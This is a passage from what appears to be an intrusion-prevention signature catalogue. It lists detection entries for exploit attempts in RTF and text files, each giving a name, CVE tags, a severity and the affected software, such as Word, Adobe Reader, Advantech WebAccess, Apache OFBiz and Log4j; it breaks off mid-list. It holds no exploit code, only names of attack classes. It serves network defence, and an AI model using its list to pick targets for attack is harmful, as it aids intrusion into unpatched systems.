About this situation: An attempt to exploit a vulnerability in Microsoft Windows MF3216 Component detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows MF3216, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Vulnerability: Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow
Description:
Back to top

File-RTF_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-08, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
Description:
Back to top

File-RTF_Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-03, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-745-5211
Vulnerability: Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution
Description:
Back to top

File-RTF_Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-03, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Vulnerability: Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution
Description:
Back to top

File-RTF_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0015

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-01, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Microsoft-Windows-Remote-Code-Execution-CVE-2016-0015
Description:
Back to top

File-RTF_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-01, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
Description:
Back to top

File-RTF_Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow

About this situation: Microsoft Word dpcallout RTF Control Word Handling Buffer Overflow
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow
Description:
Back to top

File-RTF_Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Overflow

About this situation: An attempt to exploit an integer overflow vulnerability in Microsoft Word detected
Context: RTF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Word, Microsoft Word Viewer, Microsoft Outlook, Microsoft Works, MS2008-12, CVE2008, Any Operating System not specific, Microsoft Word not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow
Description:
Back to top

File-RTF_Microsoft-Word-Font-Table-Remote-Code-Execution-CVE-2023-21716

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2023-02, CVE2023, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1563-5242
Last changed: sgpkg-ips-1563-5242
Vulnerability: Microsoft-Word-Font-Table-Remote-Code-Execution-CVE-2023-21716
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Bitmap-Biwidth-Biheight-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2016-01, CVE2016, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1623-5242
Vulnerability: Microsoft-Word-RTF-Bitmap-Biwidth-Biheight-Heap-Buffer-Overflow
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Word Desktop detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2008-05, CVE2008, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Mismatch-CVE-2012-0183

About this situation: Detected attempt to exploit a vulnerability in Microsoft Word
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office Compatibility Pack, Microsoft Office 2011, Microsoft Word 2007, Microsoft Word 2003, MS2012-05, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Word-RTF-Mismatch-CVE-2012-0183
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow

About this situation: Microsoft Word RTF Mismatched dpendgroup Buffer Overflow
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: HTTP-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Object-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2008-12, CVE2008, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-582-5211
Vulnerability: Microsoft-Word-RTF-RTF-Object-Parsing-Memory-Corruption
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902

About this situation: A malicious RTF document targeting CVE-2010-1902 over HTTP detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901

About this situation: A malicious RTF document targeting CVE-2010-1901 over HTTP detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Parsing-Stack-Exhaustion

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-583-5211
Vulnerability: Microsoft-Word-RTF-Parsing-Stack-Exhaustion
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Microsoft Word 2010, Microsoft Word 2013, Microsoft Word 2007, Microsoft Word 2003, MS2014-03, CVE2014, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-572-5211
Vulnerability: Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption

About this situation: Microsoft Word RTF Stylesheet Control Word Memory Corruption
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: HTTP-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
Description:
Back to top

File-RTF_Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption-DOS

About this situation: Microsoft Word RTF Stylesheet Control Word Memory Corruption
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Office not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: HTTP-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
Description:
Back to top

File-RTF_Microsoft-WordPad-Embedded-COM-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft WordPad detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, WordPad, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Vulnerability: Microsoft-WordPad-Embedded-COM-Code-Execution
Description:
Back to top

File-RTF_OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow

About this situation: Attempt to exploit heap overflow vulnerability in OpenOffice.org detected
Context: RTF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-RTF_RTF-File-Listid-Use-After-Free-Vulnerability

About this situation: A vulnerability in Microsoft Word
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2012-10, CVE2012, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-484-5211
Last changed: sgpkg-ips-486-5211
Vulnerability: RTF-File-Listid-Use-After-Free-Vulnerability
Description:
Back to top

File-RTF_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: RTF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-RTF_Suspicious-File

About this situation: Suspicious RTF file detected
Context: RTF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-486-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-RTF_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2023-05, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1603-5242
Last changed: sgpkg-ips-1603-5242
Vulnerability: Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
Description:
Back to top

File-RTF_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Microsoft Word 2010, Microsoft Word 2013, Microsoft Word 2007, Microsoft Word 2003, MS2012-12, MS2014-03, CVE2012, CVE2014, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-497-5211
Vulnerability: Word-RTF-Listoverridecount-RCE-CVE-2012-2539
Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
Description:
Back to top

File-TextId_.NET-Framework-Stack-Overflow-Denial-of-Service-CVE-2016-0033

About this situation: An attempt exploit a vulnerability in Microsoft .NET Framework detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2016-02, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: .NET-Framework-Stack-Overflow-Denial-of-Service-CVE-2016-0033
Description:
Back to top

File-TextId_ACDSee-Products-XPM-Values-Section-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ACDSee Systems ACDSee Photo Editor detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ACDSee, CVE2007, Any Operating System not specific, ACDSee not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-690-5211
Vulnerability: ACDSee-Products-XPM-Values-Section-Buffer-Overflow
Description:
Back to top

File-TextId_ACDSee-XBM-Header-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ACDSee detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, ACDSee, ACDSee Photo Editor, Windows not specific, ACDSee not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: ACDSee-XBM-Header-Name-Buffer-Overflow
Description:
Back to top

File-TextId_ACDSee-XPM-File-Handling-Buffer-Overflow

About this situation: Attempt to exploit stack buffer overflow vulnerability in ACDSee detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, ACDSee, ACDSee Photo Editor, ACDSee Pro, CVE2007, Windows not specific, ACDSee not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-691-5211
Vulnerability: ACDSee-XPM-File-Handling-Buffer-Overflow
Description:
Back to top

File-TextId_Acrobat-Reader-eBook-Plug-In-Format-String

About this situation: An attempt to exploit a vulnerability in Acrobat Reader detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Acrobat-Reader-eBook-Plug-In-Format-String
Description:
Back to top

File-TextId_ActiveX-WScript-Shell-Call

About this situation: A script that calls the WScript.Shell ActiveX object
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Generic HTTP client, Windows not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1072-5242
Last changed: sgpkg-ips-1072-5242
Description:
Back to top

File-TextId_Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader for Unix or Linux detected
Context: Identified Text File Stream
Severity: 7
Tags: Unix, Any Hardware, Adobe Reader, CVE2004, Unix not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution
Description:
Back to top

File-TextId_Adobe-Acrobat-XPS-Path-Element-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1064-5242
Vulnerability: Adobe-Acrobat-XPS-Path-Element-Out-Of-Bounds-Write
Description:
Back to top

File-TextId_Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Systems Digital Editions detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Digital Editions, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-935-5242
Vulnerability: Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure
Description:
Back to top

File-TextId_Adobe-Download-Manager-Buffer-Overflow

About this situation: Buffer overflow exploit against vulnerability in the Adobe Download Manager
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Download Manager, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-Adobe-Download-Manager-Buffer-Overflow
Description:
Back to top

File-TextId_Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Illustrator CS3 detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Illustrator, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow
Description:
Back to top

File-TextId_Adobe-Indesign-Server-Soap-Request-Lack-Of-Authentication

About this situation: An attempt to exploit a vulnerability in Adobe Systems InDesign detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe InDesign, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Adobe-Indesign-Server-Soap-Request-Lack-Of-Authentication
Description:
Back to top

File-TextId_Adobe-Indesign-Unsafe-Hyperlink-Processing-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems InDesign detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe InDesign, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1165-5242
Vulnerability: Adobe-Indesign-Unsafe-Hyperlink-Processing-Remote-Code-Execution
Description:
Back to top

File-TextId_Adobe-Photoshop-Asset-Elements-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Photoshop CS5.1 detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-487-5211
Vulnerability: Adobe-Photoshop-Asset-Elements-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-TextId_Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-689-5211
Vulnerability: Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-699-5211
Vulnerability: Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Getrecipeinfo-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-689-5211
Vulnerability: Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Alienvault-Ossim-AV-Centerd-Soap-Requests-Multiple-Command-Execution

About this situation: An attempt to exploit a vulnerability in AlienVault AlienVault detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AlienVault AlienVault, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Alienvault-Ossim-AV-Centerd-Soap-Requests-Multiple-Command-Execution
Description:
Back to top

File-TextId_Alienvault-Ossim-AV-Centerd-Util.pm-Remote_Task-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in AlienVault AlienVault detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AlienVault AlienVault, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1732-5242
Vulnerability: Alienvault-Ossim-AV-Centerd-Util.pm-Remote_Task-Arbitrary-Command-Execution
Description:
Back to top

File-TextId_Apache-Axis-Soap-Array-Exhaustion

About this situation: An attempt to exploit a vulnerability in Apache Axis detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Axis, CVE2004, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1345-5242
Vulnerability: Apache-Axis-Soap-Array-Exhaustion
Description:
Back to top

File-TextId_Apache-Axis-Soap-Web-Services-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Axis detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Macromedia JRun 4, ColdFusion, Java Application Server, Apache Axis, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Apache-Axis-Soap-Web-Services-Denial-Of-Service
Description:
Back to top

File-TextId_Apache-Camel-XSLT-Component-Java-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Camel detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, Apache Camel, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-569-5211
Vulnerability: Apache-Camel-XSLT-Component-Java-Code-Execution
Description:
Back to top

File-TextId_Apache-Log4j-JDBC-Appender-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Log4j detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Apache-Log4j-JDBC-Appender-JNDI-Injection
Description:
Back to top

File-TextId_Apache-Ofbiz-CVE-2021-30128-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1349-5242
Vulnerability: Apache-Ofbiz-CVE-2021-30128-Insecure-Deserialization
Description:
Back to top

File-TextId_Apache-Ofbiz-CVE-2023-49070-XmlRpc-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1669-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Apache-Ofbiz-CVE-2023-49070-XmlRpc-Insecure-Deserialization
Description:
Back to top

File-TextId_Apache-Ofbiz-XmlRpc-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1273-5242
Last changed: sgpkg-ips-1273-5242
Vulnerability: Apache-Ofbiz-XmlRpc-Insecure-Deserialization
Description:
Back to top

File-TextId_Apache-Solr-Configsets-Xml-External-Entity-Expansion-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Solr detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1087-5242
Last changed: sgpkg-ips-1087-5242
Vulnerability: Apache-Solr-Configsets-Xml-External-Entity-Expansion-Information-Disclosure
Description:
Back to top

File-TextId_Apache-Subversion-SVN-SSH-Url-Command-Execution

